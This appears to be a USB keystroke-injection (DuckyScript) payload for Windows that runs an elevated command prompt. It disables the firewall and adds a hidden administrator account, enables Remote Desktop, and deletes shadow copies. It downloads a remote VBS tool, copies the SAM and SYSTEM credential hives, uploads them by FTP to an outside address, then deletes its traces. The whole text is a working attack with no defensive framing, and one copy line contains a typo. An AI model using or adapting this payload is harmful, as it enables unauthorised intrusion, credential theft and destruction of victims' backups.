DELAY 2000
WINDOWS q
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 300
RIGHTARROW
DELAY 300
RIGHTARROW
DELAY 300
RIGHTARROW
DELAY 300
ENTER
DELAY 600
ALT y
DELAY 800
ENTER
STRING netsh firewall set opmode disable
ENTER
DELAY 300
ENTER
STRING net user attackeruser attackerpass /add && net localgroup administrators attackeruser /add
ENTER
DELAY 200
STRING y
ENTER
DELAY 400
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
ENTER
DELAY 300
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
ENTER
DELAY 300
STRING reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v attackeruser /t REG_DWORD /d 0 /f
ENTER
DELAY 300
STRING vssadmin delete shadows /all
ENTER
DELAY 200
STRING y
ENTER
DELAY 800
STRING copy con download.vbs
ENTER
STRING Set args = WScript.Arguments:a = split(args(0), "/")(UBound(split(args(0),"/")))
ENTER
STRING Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP"):objXMLHTTP.open "GET", args(0), false:objXMLHTTP.send()
ENTER
STRING If objXMLHTTP.Status = 200 Then
ENTER
STRING Set objADOStream = CreateObject("ADODB.Stream"):objADOStream.Open
ENTER
STRING objADOStream.Type = 1:objADOStream.Write objXMLHTTP.ResponseBody:objADOStream.Position = 0
ENTER
STRING Set objFSO = Createobject("Scripting.FileSystemObject"):If objFSO.Fileexists(a) Then objFSO.DeleteFile a
ENTER
STRING objADOStream.SaveToFile a:objADOStream.Close:Set objADOStream = Nothing 
ENTER
STRING End if:Set objXMLHTTP = Nothing:Set objFSO = Nothing
ENTER
CTRL z
ENTER
STRING cscript download.vbs http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs
ENTER
DELAY 800
STRING cscript vssown.vbs /start
ENTER
DELAY 1000
STRING cscript vssown.vbs /create c
ENTER
DELAY 1000
STRING cscript vssown.vbs /create c
ENTER
DELAY 1000
STRING cscript vssown.vbs /create c
ENTER
DELAY 1000
STRING cscript vssown.vbs /create c
ENTER
DELAY 1000
STRING copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\SAM .
ENTER
DELAY 800
STRING copy \\?\\GLoBALROOT\Device\HarddriskVolumeShadowCopy1\windows\system32\config\SYSTEM .
ENTER
DELAY 800
STRING cscript vssown.vbs /stop
ENTER
DELAY 800
STRING del vssown.vbs
ENTER
STRING del download.vbs
ENTER
STRING ftp
ENTER
DELAY 500
STRING open 172.16.1.2
ENTER
DELAY 800
STRING hacker
ENTER
DELAY 1000
STRING hacker
ENTER
DELAY 1000
STRING bin
ENTER
DELAY 800
STRING put SAM
ENTER
DELAY 800
STRING put SYSTEM
ENTER
DELAY 800
STRING quit
ENTER
DELAY 200
STRING DEL SAM
ENTER
STRING DEL SYSTEM
ENTER
STRING exit
ENTER
